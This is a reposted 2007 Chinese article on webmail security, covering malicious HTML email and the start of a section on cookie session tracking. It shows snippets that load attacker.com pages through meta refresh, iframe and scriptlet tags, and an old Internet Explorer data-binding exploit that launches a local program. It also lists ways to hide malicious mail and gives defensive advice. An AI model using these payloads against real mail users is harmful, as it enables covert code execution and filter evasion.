Webmail攻防实战(5)
来源:云南设计港 发布时间:2007-10-30 14:05:00
除了可以在html邮件中直接嵌入脚本程序外,攻击者还可以设计一些html代码,在用户打开html邮件时,不知不觉引入另一个html文件,而此文件中正含有恶性代码,这样不仅能直接绕过WebMail系统对脚本程序的过滤,而且还能有效避开提供了防毒服务的邮件系统对恶性代码的查杀。下面是几个调用html文件的例子:
(1)Refresh到另一个页面:
<body>
<metahttp-equiv="refresh"content="1;URL=http://www.attacker.com/another.htm">
</body>
(2)Iframe引入另一个页面:
<body>
<iframesrc="http://www.attacker.com/import.htm"frameborder="0"></iframe>
</body>
(3)scriptlet引入另一个页面:
<body>
<objecttype="text/x-scriptlet"data="http://www.attacker.com/import.htm"></object>
</body>
攻击者还可以采取如下方法,使带有恶性代码的html邮件具有更大的隐蔽性:
(1)配合邮件欺骗技术,使用户不会怀疑收到的邮件,并且攻击者也能隐藏自己的行踪。
(2)把html邮件设计成看起来像txt邮件。
(3)有时可以把html邮件中的恶性代码放在一个隐藏的层里面,表面上看不出任何变化。
针对恶性脚本程序的影响,对用户常见的建议办法是提高浏览器的安全级别,如禁用ActiveX、禁用脚本等,但这并不是一个很好的办法,因为这样会影响到用户对其他正常html页面的浏览。即使浏览器达到了最高级别,依然对某些恶性代码无济于事,下面是位以色列安全专家发现的漏洞,能让Windows系统自动执行任何本地程序,即使InternetExplorer已经禁止了ActiveX和脚本程序:
<spandatasrc="#oExec"datafld="exploit"dataformatas="html"></span>
<xmlid="oExec">
<security>
<exploit>
<![CDATA[
<objectid="oFile"classid="clsid:11111111-1111-1111-1111-
111111111111"codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
面对恶性html邮件,WebMail系统和用户似乎都没有很好的解决办法,虽然许多WebMail系统已经能够过滤掉html邮件中的很多恶性代码,不过令人遗憾的是,要想彻底过滤掉恶性代码并不是一件容易的事情,攻击者总能利用WebMail系统过滤机制和浏览器的漏洞找到办法绕过种种过滤,WebMail系统所能做的就是发现一个漏洞补一个漏洞。
为了减少乃至避免恶性html邮件的影响,在打开html邮件之前,WebMail系统有必要提醒用户这是一个html邮件,如果能提供让用户以文本方式浏览html邮件的功能,则是最好不过。在打开不明邮件之前,用户更要小心谨慎,最好把html邮件“目标另存为”到本地硬盘上再打开来看,如果能先查看html邮件源代码,则是最好不过。
另外需要特别提醒用户注意的是,虽然一些电子邮件系统会在WebMail系统上对html邮件中的恶性代码进行过滤,但在pop3服务器上并不会进行过滤,所以,如果是通过邮件客户端收取邮件,仍然要谨防恶性html邮件的危害。
五、Cookie会话攻击
当用户以自已的邮箱帐户和密码登录进WebMail以后,如果再让用户对每一步操作都输入密码加以确认就会让人不甚其烦。所以WebMail系统有必要进行用户会话跟踪,WebMail系统用到的会话跟踪技术主要有两种:cookie会话跟踪和URL会话跟踪。
Cookie是web服务器保存在用户浏览器上的文本信息,可以包含用户名、特殊ID、访问次数等任何信息,通常此信息用于标识访问同一web服务器上的不同用户,在浏览器每次访问同一web服务器时会发送过去,用于跟踪特定客户端或浏览器与web服务器进行交互的状态。
Cookie的类型有两种:持久型和临时型。持久型cookie以文本形式存储在硬盘上,由浏览器存取。使用了持久型cookie会话跟踪的WebMail系统有hotmail、yahoo电邮(可选)等。临时型cookie也称为会话cookie,存储在内存中,仅为当前浏览器的对话存储,关闭当前浏览器后会立即消失,ASP、PHP4等开发程序中用到的session对象就会产生临时型cookie。使用了临时型cookie会话跟踪的WebMail系统有FM365、亿邮等。
猜你喜欢
- 问题描述调用并传参数给其他shell脚本,传的参数带有空格,被调用的shell脚本只取了这个参数的第一个单词。代码如下# 传参脚本 test
- 首先说明一下:我是广西的!所以我备案BBS也是按照广西通信管理局的要求进行备案的!也许每个地方的要求都会有少许不同!现在我将我备案的心得和材
- 最近媒体进行大量报道 * 新闻,还举报CNNIC监管CN域名不利,接下来CNNIC * 一系列政策,比如未备案域名将停止解析等等。面对当下复杂的
- 这篇访谈有点早了,是今年3月份时的事。Matt Cutts针对Google的爬行,索引机制以及对301重定向,重复内容处理的问题做出了些回答
- 本教程介绍了如何在 Linux 终端验证域名或计算机名的 IP 地址。本教程将允许你一次检查多个域。你可能已经使用过这些命令来验证信息。但是
- 网赚如今也是一个行业,不管你承认不承认,这个行业造就了一批百千万富翁。如果你连网赚有疑问,还会搜索“网赚是真的吗”,我想你真的是要out啦。
- PHPWind v7.3.2查看好友最新帖子sql错误解决方法:打开mode/o/m_article.php查找:$where .
- 很多网站运营者都非常关注他们网站的网页级别PR值(Google PageRank)值大小,有的甚至将网站PR值与搜索引擎优化效果直接划上等号
- 用IIS,php4和mysql的软件包是php-4.0.1pl2-Win32.zip、mysql-3.23.19-beta-win.zip。
- 我认为关键词应该分为网站关键词和页面关键字,不知道别人有没有这种叫法。网站关键词是一个网站的内容的总结,告诉别人你这个网站是做什么的。页面关
- 第一步:数据表修改首先将数据表中的keyword的varchar()改为varchar(任意长度,例如200)dede_archivesde
- 一、请求筛选模块被配置为拒绝包含双重转义序列的请求。HTTP 错误 404.11 - Not Found 1.单击
- 关于IIS服务器的安全主要包括六步:1、使用安全配置向导(Security Configuration Wizard)来决定web服务器所需
- 微软 Bing 的出现让新一轮搜索引擎大战一触即发。Bing 提供了许多实用的新功能,Google 则始终以高质量搜索结果坚守阵地,而 Ya
- 美图秀秀是一款超好用的国产图片美化软件,拥有图片处理、美容、饰品、边框、场景、闪图、摇头娃娃等多种功能,功能强大且操作简单,让你不用PS也能
- 最近一个朋友的Blog在做301重定向的过程中遇到了一些困难。大概的情况就是,原来的Blog域名不打算做了,在新的域名上重启炉灶,重新开始写
- Yupoo今日的收费对国内Web2.0服务来说是一件振奋人心的消息。虽然和Flickr相比,Yupoo还有很远的路要走,但其用户体验已经大大
- 很庆幸,12年前一不留神进入了IT行业,具体说,是进入了IT媒体领域。在最合适的时机,进入了最合适的领域,得以全程经历中国互联网的萌生和成长
- Exchange 2000具有创造多种存储群组的能力,其中包括各种邮箱或公共文件夹存储。不幸的是,为弥补存储器碎片问题,要更好地持续利用Ex
- 搜索引擎会对恶意进行SEO的网站进行惩罚,如清除所有链接。百度对作弊的判断条件:(1)在网页源代码的任意位置,故意加入与网页内容不相关的关键